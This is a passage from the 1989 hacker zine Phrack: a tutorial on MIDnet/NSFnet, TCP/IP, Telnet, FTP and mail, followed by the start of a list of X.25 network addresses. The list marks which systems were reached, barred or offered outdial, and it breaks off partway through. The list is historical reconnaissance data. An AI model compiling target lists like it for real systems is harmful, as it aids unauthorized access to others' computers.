For those that wish to contact me for commentary on this file topic or other
topic conversation, you can send e-mail to my network addresses:

                    Internet:  [email protected]
                      Bitnet:  [email protected]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 3 of 12

       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
       <>                                                            <>
       <>                   Introduction to MIDNET                   <>
       <>                   ~~~~~~~~~~~~~~~~~~~~~~                   <>
       <>        Chapter Seven Of The Future Transcendent Saga       <>
       <>                                                            <>
       <>               A More Indepth Look Into NSFnet              <>
       <>             National Science Foundation Network            <>
       <>                                                            <>
       <>                Presented by Knight Lightning               <>
       <>                        June 16, 1989                       <>
       <>                                                            <>
       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>


Prologue
~~~~~~~~
If you are not already familiar with NSFnet, I would suggest that you read:

"Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and definitely;
"NSFnet:  National Science Foundation Network" (Phrack Inc., Volume Three,
                                                Issue 26, File 4 of 11).


Table Of Contents
~~~~~~~~~~~~~~~~~
*  Introduction
*  The DOD Protocol Suite
*  Names and Addresses In A Network
*  Telnet (*NOT* Telenet)
*  File Transfer
*  Mail


Introduction
~~~~~~~~~~~~
MIDNET is a regional computer network that is part of the NSFnet, the National
Science Foundation Network.  Currently, eleven mid-United States universities
are connected to each other and to the NSFnet via MIDnet:

UA  - University of Arkansas at Fayetteville
ISU - Iowa State University at Ames
UI  - University of Iowa at Iowa City
KSU - Kansas State University at Manhattan
KU  - University of Kansas at Lawrence
UMC - University of Missouri at Columbia
WU  - Washington University at St. Louis, Missouri
UNL - University of Nebraska at Lincoln
OSU - Oklahoma State University at Stillwater
UT  - University of Tulsa (Oklahoma)
OU  - University of Oklahoma at Norman

Researchers at any of these universities that have funded grants can access the
six supercomputer centers funded by the NSF:

John Von Neuman Supercomputer Center
National Center for Atmospheric Research
Cornell National Supercomputer Facility
National Center for Supercomputing Applications
Pittsburgh Supercomputing Center
San Diego Supercomputing Center

In addition, researchers and scientists can communicate with each other over a
vast world-wide computer network that includes the NSFnet, ARPAnet, CSnet,
BITnet, and others that you have read about in The Future Transcendent Saga.
Please refer to "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13)
for more details.

MIDnet is just one of several regional computer networks that comprise the
NSFnet system.  Although all of these regional computer networks work the same,
MIDnet is the only one that I have direct access to and so this file is written
from a MIDnet point of view.  For people who have access to the other regional
networks of NSFnet, the only real differences depicted in this file that would
not apply to the other regional networks are the universities that are served
by MIDnet as opposed to:

NYSERnet  in New York State
SURAnet   in the southeastern United States
SEQSUInet in Texas
BARRnet   in the San Francisco area
MERIT     in Michigan

           (There are others that are currently being constructed.)

These regional networks all hook into the NSFnet backbone, which is a network
that connects the six supercomputer centers.  For example, a person at Kansas
State University can connect with a supercomputer via MIDnet and the NSFnet
backbone.  That researcher can also send mail to colleagues at the University
of Delaware by using MIDnet, NSFnet and SURAnet.  Each university has its own
local computer network which connects on-campus computers as well as providing
a means to connecting to a regional network.

Some universities are already connected to older networks such as CSnet, the
ARPAnet and BITnet.  In principal, any campus connected to any of these
networks can access anyone else in any other network since there are gateways
between the networks.

Gateways are specialized computers that forward network traffic, thereby
connecting networks.  In practice, these wide-area networks use different
networking technology which make it impossible to provide full functionality
across the gateways.  However, mail is almost universally supported across all
gateways, so that a person at a BITnet site can send mail messages to a
colleague at an ARPAnet site (or anywhere else for that matter).  You should
already be somewhat familiar with this, but if not refer to;

"Limbo To Infinity" (Phrack Inc., Volume Two, Issue 24, File 3 of 13) and
"Internet Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 11)

Computer networks rely on hardware and software that allow computers to
communicate.  The language that enables network communication is called a
protocol.  There are many different protocols in use today.  MIDnet uses the
TCP/IP protocols, also known as the DOD (Department of Defense) Protocol Suite.

Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet.  In fact,
all the regional networks that are linked to the NSFnet backbone are required
to use TCP/IP.  At the local campus level, TCP/IP is often used, although other
protocols such as IBM's SNA and DEC's DECnet are common.  In order to
communicate with a computer via  MIDnet and the NSFnet, a computer at a campus
must use TCP/IP directly or use a gateway that will translate its protocols
into TCP/IP.

The Internet is a world-wide computer network that is the conglomeration of
most of the large wide area networks, including ARPAnet, CSnet, NSFnet, and the
regionals, such as MIDnet.  To a lesser degree, other networks such as BITnet
that can send mail to hosts on these networks are included as part of the
Internet.  This huge network of networks, the Internet, as you have by now read
all about in the pages of Phrack Inc., is a rapidly growing and very complex
entity that allows sophisticated communication between scientists, students,
government officials and others.  Being a part of this community is both
exciting and challenging.

This chapter of the Future Transcendent Saga gives a general description of the
protocols and software used in MIDnet and the NSFNet.  A discussion of several
of the more commonly used networking tools is also included to enable you to
make practical use of the network as soon as possible.


The DOD Protocol Suite
~~~~~~~~~~~~~~~~~~~~~~
The DOD Protocol Suite includes many different protocols.  Each protocol is a
specification of how communication is to occur between computers.  Computer
hardware and software vendors use the protocol to create programs and sometimes
specialized hardware in order to implement the network function intended by the
protocol.  Different implementations of the same protocol exist for the varied
hardware and operating systems found in a network.

The three most commonly used network functions are:

Mail          -- Sending and receiving messages
File Transfer -- Sending and receiving files
Remote Login  -- Logging into a distant computer

Of these, mail is probably the most commonly used.

In the TCP/IP world, there are three different protocols that realize these
functions:

SMTP   -- (Simple Mail Transfer Protocol) Mail
FTP    -- (File Transfer Protocol) sending and receiving files
Telnet -- Remote login

How to use these protocols is discussed in the next section.  At first glance,
it is not obvious why these three functions are the most common.  After all,
mail and file transfer seem to be the same thing.  However, mail messages are
not identical to files, since they are usually comprised of only ASCII
characters and are sequential in structure.  Files may contain binary data and
have complicated, non-sequential structures.  Also, mail messages can usually
tolerate some errors in transmission whereas files should not contain any
errors.  Finally, file transfers usually occur in a secure setting (i.e. The
users who are transferring files know each other's names and passwords and are
permitted to transfer the file, whereas mail can be sent to anybody as long as
their name is known).

While mail and transfer accomplish the transfer of raw information from one
computer to another, Telnet allows a distant user to process that information,
either by logging in to a remote computer or by linking to another terminal.
Telnet is most often used to remotely log in to a distant computer, but it is
actually a general-purpose communications protocol.  I have found it incredibly
useful over the last year.  In some ways, it could be used for a great deal of
access because you can directly connect to another computer anywhere that has
TCP/IP capabilities, however please note that Telnet is *NOT* Telenet.

There are other functions that some networks provide, including the following:

- Name to address translation for networks, computers and people
- The current time
- Quote of the day or fortune
- Printing on a remote printer, or use of any other remote peripheral
- Submission of batch jobs for non-interactive execution
- Dialogues and conferencing between multiple users
- Remote procedure call (i.e. Distributing program execution over several
                              remote computers)
- Transmission of voice or video information

Some of these functions are still in the experimental stages and require faster
computer networks than currently exist.  In the future, new functions will
undoubtedly be invented and existing ones improved.

The DOD Protocol Suite is a layered network architecture, which means that
network functions are performed by different programs that work independently
and in harmony with each other.  Not only are there different programs but
there are different protocols.  The protocols SMTP, FTP and Telnet are
described above.  Protocols have been defined for getting the current time, the
quote of the day, and for translating names.  These protocols are called
applications protocols because users directly interact with the programs that
implement these protocols.

The Transmission Control Protocol, TCP, is used by many of the application
protocols.  Users almost never interact with TCP directly.  TCP establishes a
reliable end-to-end connection between two processes on remote computers.  Data
is sent through a network in small chunks called packets to improve reliability
and performance.  TCP ensures that packets arrive in order and without errors.
If a packet does have errors, TCP requests that the packet be retransmitted.

In turn, TCP calls upon IP, Internet Protocol, to move the data from one
network to another.  IP is still not the lowest layer of the architecture,
since there is usually a "data link layer protocol" below it.  This can be any
of a number of different protocols, two very common ones being X.25 and
Ethernet.

FTP, Telnet and SMTP are called "application protocols", since they are
directly used by applications programs that enable users to make use of the
network.  Network applications are the actual programs that implement these
protocols and provide an interface between the user and the computer.  An
implementation of a network protocol is a program or package of programs that
provides the desired network function such as file transfer.  Since computers
differ from vendor to vendor (e.g. IBM, DEC, CDC), each computer must have its
own implementation of these protocols.  However, the protocols are standardized
so that computers can interoperate over the network (i.e. Can understand and
process each other's data).  For example, a TCP packet generated by an IBM
computer can be read and processed by a DEC computer.

In many instances, network applications programs use the name of the protocol.
For example, the program that transfers files may be called "FTP" and the
program that allows remote logins may be called "Telnet."  Sometimes these
protocols are incorporated into larger packages, as is common with SMTP.  Many
computers have mail programs that allow users on the same computer to send mail
to each other.  SMTP functions are often added to these mail programs so that
users can also send and receive mail through a network.  In such cases, there
is no separate program called SMTP that the user can access, since the mail
program provides the user interface to this network function.

Specific implementation of network protocols, such as FTP, are tailored to the
computer hardware and operating system on which they are used.  Therefore, the
exact user interface varies from one implementation to another.  For example,
the FTP protocol specifies a set of FTP commands which each FTP implementation
must understand and process.  However, these are usually placed at a low level,
often invisible to the user, who is given a higher set of commands to use.

These higher-level commands are not standardized so they may vary from one
implementation of FTP to another.  For some operating systems, not all of these
commands make equal sense, such as "Change Directory," or may have different
meanings.  Therefore the specific user interface that the user sees will
probably differ.

This file describes a generic implementation of the standard TCP/IP application
protocols.  Users must consult local documentation for specifics at their
sites.


Names and Addresses In A Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In DOD Protocol Suite, each network is given a unique identifying number.  This
number is assigned by a central authority, namely the Network Information
Center run by SRI, abbreviated as SRI-NIC, in order to prevent more than one
network from having the same network number.  For example, the ARPAnet has
network number 10 while MIDnet has a longer number, namely 128.242.

Each host in a network has a unique identification so other hosts can specify
them unambiguously.  Host numbers are usually assigned by the organization that
manages the network, rather than one central authority.  Host numbers do not
need to be unique throughout the whole Internet but two hosts on the same
network need to have unique host numbers.

The combination of the network number and the host number is called the IP
address of the host and is specified as a 32-bit binary number.  All IP
addresses in the Internet are expressible as 32-bit numbers, although they are
often written in dotted decimal notation.  Dotted decimal notation breaks the
32-bit number into four eight-bit parts or octets and each octet is specified
as a decimal number.  For example, 00000001 is the binary octet that specifies
the decimal number 1, while 11000000 specifies 192.  Dotted decimal notation
makes IP addresses much easier to read and remember.

Computers in the Internet are also identified by hostnames, which are strings
of characters, such as "phrackvax."  However, IP packets must specify the
32-bit IP address instead of the hostname so  some way to translating hostnames
to IP addresses must exist.

One way is to have a table of hostnames and their corresponding IP addresses,
called a hosttable.  Nearly every TCP/IP implementation has such a hosttable,
although the weaknesses of this method are forcing a shift to a new scheme
called the domain name system.  In UNIX systems, the hosttable is often called
"/etc/hosts."  You can usually read this file and find out what the IP
addresses of various hosts are.  Other systems may call this file by a
different name and make it unavailable for public viewing.

Users of computers are generally given accounts to which all charges for
computer use are billed.  Even if computer time is free at an installation,
accounts are used to distinguish between the users and enforce file
protections.  The generic term "username" will be used in this file to refer to
the name by which the computer account is accessed.

In the early days of the ARPAnet which was the first network to use the TCP/IP
protocols, computer users were identified by their username, followed by a
commercial "at" sign (@), followed by the hostname on which the account
existed.  Networks were not given names, per se, although the IP address
specified a network number.

For example, "knight@phrackvax" referred to user "knight" on host "phrackvax."
This did not specify which network "phrackvax" was on, although that
information could be obtained by examining the hosttable and the IP address for
"phrackvax."  (However, "phrackvax" is a ficticious hostname used for this
presentation.)

As time went on, every computer on the network had to have an entry in its
hosttable for every other computer on the network.  When several networks
linked together to form the Internet, the problem of maintaining this central
hosttable got out of hand.  Therefore, the domain name scheme was introduced to
split up the hosttable and make it smaller and easier to maintain.

In the new domain name scheme, users are still identified by their usernames,
but hosts are now identified by their hostname and any and all domains of which
they are a part.  For example, the following address,
"[email protected]" specifies username "KNIGHT" on host "UMCVMB".
However, host "UMCVMB" is a part of the domain "MISSOURI" " which is in turn
part of the domain "EDU".  There are other domains in "EDU", although only one
is named "MISSOURI".  In the domain "MISSOURI", there is only one host named
"UMCVMB".

However, other domains in "EDU" could theoretically have hosts named "UMCVMB"
(although I would say that this is rather unlikely in this example).  Thus the
combination of hostname and all its domains makes it unique.  The method of
translating such names into IP addresses is no longer as straightforward as
looking up the hostname in a table.  Several protocols and specialized network
software called nameservers and resolvers implement the domain name scheme.

Not all TCP/IP implementations support domain names because it is rather new.
In those cases, the local hosttable provides the only way to translate
hostnames to IP addresses.  The system manager of that computer will have to
put an entry into the hosttable for every host that users may want to connect
to.  In some cases, users may consult the nameserver themselves to find out the
IP address for a given hostname and then use that IP address directly instead
of a hostname.

I have selected a few network hosts to demonstrate how a host system can be
specified by both the hostname and host numerical address.  Some of the nodes I
have selected are also nodes on BITnet, perhaps even some of the others that I
do not make a note of due a lack of omniscent awareness about each and every
single host system in the world :-)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Numerical      Hostname                   Location                       BITnet
---------      --------                   --------                       ------
18.72.0.39     ATHENA.MIT.EDU             (Mass. Institute of Technology)     ?
26.0.0.73      SRI-NIC.ARPA               (DDN Network Information Center)    -
36.21.0.13     MACBETH.STANFORD.EDU       (Stanford University)               ?
36.21.0.60     PORTIA.STANFORD.EDU        (Stanford University)               ?
128.2.11.131   ANDREW.CMU.EDU             (Carnegie Mellon University)   ANDREW
128.3.254.13   LBL.GOV                    (Lawrence Berkeley Labrotories)   LBL
128.6.4.7      RUTGERS.RUTGERS.EDU        (Rutgers University)                ?
128.59.99.1    CUCARD.MED.COLUMBIA.EDU    (Columbia University)               ?
128.102.18.3   AMES.ARC.NASA.GOV          (Ames Research Center [NASA])       -
128.103.1.1    HARVARD.EDU                (Harvard University)          HARVARD
128.111.24.40  HUB.UCSB.EDU               (Univ. Of Calif-Santa Barbara)      ?
128.115.14.1   LLL-WINKEN.LLNL.GOV        (Lawrence Livermore Labratories)    -
128.143.2.7    UVAARPA.VIRGINIA.EDU       (University of Virginia)            ?
128.148.128.40 BROWNVM.BROWN.EDU          (Brown University)              BROWN
128.163.1.5    UKCC.UKY.EDU               (University of Kentucky)         UKCC
128.183.10.4   NSSDCA.GSFC.NASA.GOV       (Goddard Space Flight Center [NASA])-
128.186.4.18   RAI.CC.FSU.EDU             (Florida State University)        FSU
128.206.1.1    UMCVMB.MISSOURI.EDU        (Univ. of Missouri-Columbia)   UMCVMB
128.208.1.15   MAX.ACS.WASHINGTON.EDU     (University of Washington)        MAX
128.228.1.2    CUNYVM.CUNY.EDU            (City University of New York)  CUNYVM
129.10.1.6     NUHUB.ACS.NORTHEASTERN.EDU (Northeastern University)       NUHUB
131.151.1.4    UMRVMA.UMR.EDU             (University of Missouri-Rolla) UMRVMA
192.9.9.1      SUN.COM                    (Sun Microsystems, Inc.)            -
192.33.18.30   VM1.NODAK.EDU              (North Dakota State Univ.)    NDSUVM1
192.33.18.50   PLAINS.NODAK.EDU           (North Dakota State Univ.)    NDSUVAX

Please Note:  Not every system on BITnet has an IP address.  Likewise, not
              every system that has an IP address is on BITnet.  Also, while
              some locations like Stanford University may have nodes on BITnet
              and have hosts on the IP as well, this does not neccessarily
              imply that the systems on BITnet and on IP (the EDU domain in
              this case) are the same systems.

              Attempts to gain unauthorized access to systems on the Internet
              are not tolerated and is legally a federal offense.  At some
              hosts, they take this very seriously, especially the government
              hosts such as NASA's Goddard Space Flight Center, where they do
              not mind telling you so at the main prompt when you connect to
              their system.

              However, some nodes are public access to an extent.  The DDN
              Network Information Center can be used by anyone.  The server and
              database there have proven to be an invaluable source of
              information when locating people, systems, and other information
              that is related to the Internet.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Telnet

~~~~~~
Remote login refers to logging in to a remote computer from a terminal
connected to a local computer.  Telnet is the standard protocol in the DOD
Protocol Suite for accomplishing this.  The "rlogin" program, provided with
Berkeley UNIX systems and some other systems, also enables remote login.

For purposes of discussion, the "local computer" is the computer to which your
terminal is directly connected while the "remote computer" is the computer on
the network to which you are communicating and to which your terminal is *NOT*
directly connected.

Since some computers use a different method of attaching terminals to
computers, a better definition would be the following:  The "local computer" is
the computer that you are currently using and the "remote computer" is the
computer on the network with which you are or will be communicating.  Note that
the terms "host" and "computer" are synonymous in the following discussion.

To use Telnet, simply enter the command: TELNET

The prompt that Telnet gives is:  Telnet>

(However, you can specify where you want to Telnet to immediately and bypass
the the prompts and other delays by issuing the command:  TELNET [location].)

There is help available by typing in ?.  This prints a list of all the valid
subcommands that Telnet provides with a one-line explanation.

Telnet> ?

To connect to to another computer, use the open subcommand to open a connection
to that computer.  For example, to connect to the host "UMCVMB.MISSOURI.EDU",
do "open umcvmb.missouri.edu"

Telnet will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu" into an
IP address and will send a packet to that host requesting login.  If the remote
host decides to let you attempt a login, it prompts you for your username and
password.  If the host does not respond, Telnet will "time out" (i.e. Wait for
a reasonable amount of time such as 20 seconds) and then terminate with a
message such as "Host not responding."

If your computer does not have an entry for a remote host in its hosttable and
it cannot resolve the name, you can use the IP address explicitly in the telnet
command.  For example,

TELNET 26.0.0.73 (Note:  This is the IP address for the DDN Network Information
                 Center [SRI-NIC.ARPA])

If you are successful in logging in, your terminal is connected to the remote
host.  For all intents and purposes, your terminal is directly hard-wired to
that host and you should be able to do anything on your remote terminal that
you can do at any local terminal.  There are a few exceptions to this rule,
however.

Telnet provides a network escape character, such as CONTROL-T. You can find out
what the escape character is by entering the "status" subcommand:

Telnet> status

You can change the escape character by entering the "escape" subcommand:

Telnet> escape

When you type in the escape character, the Telnet prompt returns to your screen
and you can enter subcommands.  For example, to break the connection, which
usually logs you off the remote host, enter the subcommand "quit":

Telnet> quit

Your Telnet connection usually breaks when you log off the remote host, so the
"quit" subcommand is not usually used to log off.

When you are logged in to a remote computer via Telnet, remember that there is
a time delay between your local computer and the remote one.  This often
becomes apparent to users when scrolling a long file across the terminal screen
nd they wish to cancel the scrolling by typing CONTROL-C or something similar.
After typing the special control character, the scrolling continues.  The
special control character takes a certain amount of time to reach the remote
computer which is still scrolling information.  Thus response from the remote
computer will not likely be as quick as response from a local computer.

Once you are remotely logged on, the computer you are logged on to effectively
becomes your "local computer," even though your original "local computer" still
considers you logged on.  You can log on to a third computer which would then
become your "local computer" and so on.  As you log out of each session, your
previous session becomes active again.


File Transfer
~~~~~~~~~~~~~

FTP is the program that allows files to be sent from one computer to another.
"FTP" stands for "File Transfer Protocol".

When you start using FTP, a communications channel with another computer on the
network is opened.  For example, to start using FTP and initiate a file
transfer session with a computer on the network called "UMCVMB", you would
issue the following subcommand:

FTP UMCVMB.MISSOURI.EDU

Host "UMCVMB" will prompt you for an account name and password.  If your login
is correct, FTP will tell you so, otherwise it will say "login incorrect."  Try
again or abort the FTP program.  (This is usually done by typing a special
control character such as CONTROL-C.  The "program abort" character varies from
system to system.)

Next you will see the FTP prompt, which is:

Ftp>

There are a number of subcommands of FTP.  The subcommand "?" will list these
commands and a brief description of each one.

You can initiate a file transfer in either direction with FTP, either from the
remote host or to the remote host.  The "get" subcommand initiates a file
transfer from the remote host (i.e. Tells the remote computer to send the file
to the local computer [the one on which you issued the "ftp" command]).  Simply
enter "get" and  FTP will prompt you for the remote host's file name and the
(new) local host's file name.  Example:

Ftp> get
Remote file name?
theirfile
local file name?
myfile

ou can abbreviate this by typing both file names on the same line as the "get"
subcommand.  If you do not specify a local file name, the new local file will
be called the same thing as the remote file.  Valid FTP subcommands to get a
file include the following:

get theirfile myfile
get doc.x25

The "put" subcommand works in a similar fashion and is used to send a file from
the local computer to the remote computer.  Enter the command "put" and FTP
will prompt you for the local file name and then the remote file name.  If the
transfer cannot be done because the file doesn't exist or for some other
reason, FTP will print an error message.

There are a number of other subcommands in FTP that allow you to do many more
things.  Not all of these are standard so consult your local documentation or
type a question mark at the FTP prompt.  Some functions often built into FTP
include the ability to look at files before getting or putting them, the
ability to change directories, the ability to delete files on the remote
computer, and the ability to list the directory on the remote host.

An intriguing capability of many FTP implementations is "third party
transfers."  For example, if you are logged on computer A and you want to cause
computer B to send a file to computer C, you can use FTP to connect to computer
B and use the "rmtsend" command.  Of course, you have to know usernames and
passwords on all three computers, since FTP never allows you to peek into
someone's directory and files unless you know their username and password.

The "cd" subcommand changes your working directory on the remote host.  The
"lcd" subcommand changes the directory on the local host.  For UNIX systems,
the meaning of these subcommands is obvious.  Other systems, especially those
that do not have directory-structured file system, may not implement these
commands or may implement them in a different manner.

The "dir" and "ls" subcommands do the same thing, namely list the files in the
working directory of of the remote host.

The "list" subcommand shows the contents of a file without actually putting it
into a file on the local computer.  This would be helpful if you just wanted to
inspect a file.  You could interrupt it before it reached the end of the file
by typing CONTROL-C or some other special character.  This is dependent on your
FTP implementation.

The "delete" command can delete files on the remote host.  You can also make
and remove directories on the remote host with "mkdir" and "rmdir".  The
"status" subcommand will tell you if you are connected and with whom and what
the state of all your options are.

If you are transferring binary files or files with any non-printable
characters, turn binary mode on by entering the "binary" subcommand:

binary

To resume non-binary transfers, enter the "ascii" subcommand.

Transferring a number of files can be done easily by using "mput" (multiple
put) and "mget" (multiple get).  For example, to get every file in a particular
directory, first issue a "cd" command to  change to that directory and then an
"mget" command with an asterisk to indicate every file:

cd somedirectory
mget *

When you are done, use the "close" subcommand to break the communications link.
You will still be in FTP, so you must use the "bye" subcommand to exit FTP and
return to the command level.  The "quit" subcommand will close the connection
and exit from FTP at the same time.


Mail
~~~~
Mail is the simplest network facility to use in many ways.  All you have to do
is to create your message, which can be done with a file editor or on the spur
of the moment, and then send it.  Unlike FTP and Telnet, you do not need to
know the password of the username on the remote computer.  This is so because
you cannot change or access the files of the remote user nor can you use their
account to run programs.  All you can do is to send a message.

There is probably a program on your local computer which does mail between
users on that computer.  Such a program is called a mailer.  This may or may
not be the way to send or receive mail from other computers on the network,
although integrated mailers are more and more common.  UNIX mailers will be
used as an example in this discussion.

Note that the protocol which is used to send and receive mail over a TCP/IP
network is called SMTP, the "Simple Mail Transfer Protocol."  Typically, you
will not use any program called SMTP, but rather your local mail program.

UNIX mailers are usually used by invoking a program named "mail".  To receive
new mail, simply type "mail".

There are several varieties of UNIX mailers in existence.  Consult your local
documentation for details.  For example, the command "man mail" prints out the
manual pages for the mail program on your computer.

To send mail, you usually specify the address of the recipient on the mail
command.  For example: "mail [email protected]" will send the
following message to username "knight" on host "umcvmb".

You can usually type in your message one line at a time, pressing RETURN after
each line and typing CONTROL-D to end the message. Other facilities to include
already-existing files sometimes exist.  For example, Berkeley UNIXes allow you
to enter commands similar to the following to include a file in your current
mail message:

r myfile

In this example, the contents of "myfile" are inserted into the message at this
point.

Most UNIX systems allow you to send a file through the mail by using input
redirection.  For example:

mail [email protected] < myfile

In this example, the contents of "myfile" are sent as a message to "knight" on
"umcvmb."

Note that in many UNIX systems the only distinction between mail bound for
another user on the same computer and another user on a remote computer is
simply the address specified.  That is, there is no hostname for local
recipients.  Otherwise, mail functions in exactly the same way.  This is common
for integrated mail packages.  The system knows whether to send the mail
locally or through the network based on the address and the user is shielded
from any other details.


                  "The Quest For Knowledge Is Without End..."
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 4 of 12

               :.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
               :.:                                           :.:
               :.:  NUA-List For Datex-P And X.25 Networks   :.:
               :.:                                           :.:
               :.:               by Oberdaemon               :.:
               :.:                                           :.:
               :.:               April 9, 1989               :.:
               :.:                                           :.:
               :.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:

 _____________________________________________________________________________
|                                                                             |
|  Key:                                                                       |
|                                                                             |
|  A    = successfully connected                                              |
|  B    = sources say that it works                                           |
|  C    = officially closed                                                   |
|  D    = disconnected/no circuit or permanently busy                         |
|  I    = illegal address or invalid call                                     |
|  O    = out of order                                                        |
|  r    = R-NUA                                                               |
|  T    = time-out                                                            |
|  X    = sources say that it should work but it doesn't (or is permanently   |
|         busy)                                                               |
|  Y    = barred (=?)                                                         |
|  Z    = sources say that it should not work                                 |
|      = including the following digits gives you another number             |
|  n/a  = not yet tested                                                      |
|  ?    = error on a subsequent communication system                          |
|                                                                             |
| Remark: I have also included some obviously misstyped NUAs which have been  |
|         found in widely circulating lists.  There are also numbers which do |
|         not form a valid NUA but a common prefix (e.g. 0202 2  Helpak).     |
|                                                                             |
| Format: Each NUA in this list consists of the following fields:             |
|                                                                             |
|         cccc naa aaa aaa... oooo...      ddd....                            |
|                                                                             |
|  cccc       is the country prefix (e.g. 0262 Germany). This prefix can be   |
|             omitted when calling and called party have both the same prefix.|
|  naa        are the first three digits of the address. n often specifies a  |
|             certain network in that country.                                |
|  aaa aaa... are the other digits of the address.                            |
|  oooo...    are some extra digits/letters which should be added after the   |
|             NUA. The correct syntax depends on your PAD. This list uses any |
|             syntax - usually depending on the notation the author of the    |
|             source used. The oooo... field is usually empty.                |
|  ddd...     is a short description of the service.                          |
|                                                                             |
| If you find two NUAs who differ only in the number of trailing zeroes, but  |
| connect to the same service, you may safely throw away the longer one.      |
|                                                                             |
|  !!  Please note that most PADs don't accept spaces inside a NUA  !!        |
|_____________________________________________________________________________|


  0200                  GR         Greece
  0202
  0202 2                           Helpak (enkelriktad trafik)
X 0202 452 241 24104
  0204                  NL         Netherlands
  0204 0                           Datanet (1?)
  0204 1                           Datanet (1?)
A 0204 129 001 3                   ? (Netz ?)
A 0204 129 001 4                   X.25
A 0204 129 003 1                   NONOBY
A 0204 129 003 4                   Searchline
D 0204 129 004 33       SARA       National Institute for High Energy Physics
                                   (NIKHEF) SARA network
D 0204 129 004 34       NIKHEF     National Institute for High Energy Physics
                                   (NIKHEF) SARA network
D 0204 129 005 6        MCVAX      MCVAX, HOLLAND
A 0204 129 005 675      HARING     MCVAX Line 2
   0204 129 400 2                   DUPHAR WEESP,HOLLAND
A 0204 134 014 80500               Utrecht ?
  0204 303 0                       EPOIS EPO Den Haag
  0204 304 0                       DSAMISOOM SAMSON
  0204 4                           Dabas
  0206                  B          Belgium
  0206 2                           DCS
A 0206 210 300 003                 Eigebib
A 0206 222 100 6        BBDA       Brussels DEC A
A 0206 222 101 2        ?          Ministry of economic affairs
A 0206 222 102 6                   celex
A 0206 224 001 903      PRLB2      Belgium Unix Backbone
  0206 3                           Euronet
A 0206 228 821 0                   DGxiiiF
  0208                  F          France
  0208 0                TRANSPAC   French Transpac
A 0208 006 040 010                 Telesystemes 1
A 0208 006 040 201                 Telesystemes 2
A 0208 026 020 843                 ?
A 0208 034 020 036      CNUSC      CNUSC (France)
A 0208 034 020 258      CNUSC      CNUSC Montpelier
A 0208 038 020 100                 CICG Grenoble
A 0208 038 020 676                 ILL VEGA VAX 8700 VMS 4.7
I 0208 044 001 645                 ?
A 0208 057 040 540                 QSD (Chat system)
I 0208 069 021 258
A 0208 075 000 087      IRCAM      IRCAM-ERIK VAX 11/780 4.2 BSD
I 0208 075 000 355                 ?
I 0208 075 001 281*D    CCPN       Computing Centre Nuclear Physics
I 0208 075 002 314                 GRF
A 0208 075 020 655      LITP       LITP Unix 4.3 BSD (France)
A 0208 075 041 280                 Pasteur MV8000
A 0208 078 020 118      INRIA      INRIA, Rocquencourt (France) Multics
B 0208 078 020 16901    INRIA      Institute National de Recherche en
                                   Informatique
  0208 078 081 67304    INRIAUU    INRIA - UUCICO
I 0208 091 000 270*DCISICISI3      IBM - TSO
I 0208 091 000 309*DCISICISI1      IBM - TSO
I 0208 091 000 519*DCISICISI2      IBM - TSO
I 0208 091 010 320      CJRCE
I 0208 091 040 047      SACLAY     Saclay - France
I 0208 091 040 532                 Pascal
A 0208 091 190 258                 LURE, VAX 11/780 VMS 4.6, Synchrotron
                                   source (SES)
  0208 1                           NTI
A 0208 101              TEXTFRA    Text Generator, FRANCE
  0214                  E          Spain
  0214 1                SPAIN      Spanish data network (NID/CTNE)
  0214 5                           Iberpac
O 0214 521 202 5022
A 0214 521 302 1020                ETSITM (EANNET) VAX 11/750 VMS 4.5
  0222                  I          Italy
  0222 2                           Itapac
A 0222 262 002 1        ESAIRS1    ESA-QUEST, IRS 1
I 0222 262 002 2        ESAIRS2    ESA-IRS 2
O 0222 262 003 2                   IASI VAX
A 0222 262 004 3                   VAXLNF (INFNET) VAX 8650
O 0222 263 200 4                   NUA-Information ?
A 0222 265 014 0                   Techni-Link
I 0222 306 3                       Progetto-Sirio
I 0222 306 700                     European Space Agency
I 0222 306 9*D          CNUCE      CNUCE
I 0222 307 0                       CILEA
I 0222 307 1                       CED Datenbanksysteme Rom
I 0222 307 2*D          RTC20      JRC
I 0222 307 7*D QUESTD5  ESA        ESA
D 0222 307 8*D QUESTD5  ESA2       ESA
  0228                  CH         Switzerland
D 0228 310 1*DN         DATASTAR   Data-Star, Switzerland
  0228 4                           Telepac
A 0228 462 110 0101                Cigy IBMA
A 0228 462 110 0102                Cigy DEC1091
A 0228 462 110 09                  EDP Basel
A 0228 462 110 23                  ?
A 0228 462 110 34                  ?
A 0228 462 110 36                  ?
A 0228 462 110 52                  DANZA'S 11/785 VMS 4.4
A 0228 462 110 61                  PKK node RBPK00
A 0228 462 110 66                  PROGNOS Basel (CIERR 1402)
A 0228 462 110 70                  ?
A 0228 462 110 84                  (CIERR 1402)
Y 0228 462 170 02                  INFOTEX PTT
I 0228 464 109 06                  GD PTT Schweiz (ring with CTRL G)
A 0228 464 110 10       DM         DATAMAIL (RSAG)
A 0228 464 110 110      DSTAR2     Datastar (2nd. Line)
A 0228 464 110 112                 RSAG
Z 0228 464 110 113                 RSAG
A 0228 464 110 115      DATASTAR   Data-Star, Switzerland (Pharmadatenbank ?)
A 0228 468 113 150                 Management Joint Trust
D 0228 468 114 05       CERN       CERN (=CERNXX?)
A 0228 468 114 0505                CS Group LAVC on node UXCOMS
A 0228 468 114 0510     CER        CERN, Geneva
A 0228 468 114 0510     CERNVAX    CERN X25 Multigate
B 0228 468 114 0510*DLO CERNLO     CERN 300 bps     OUTDIAL (where ???)
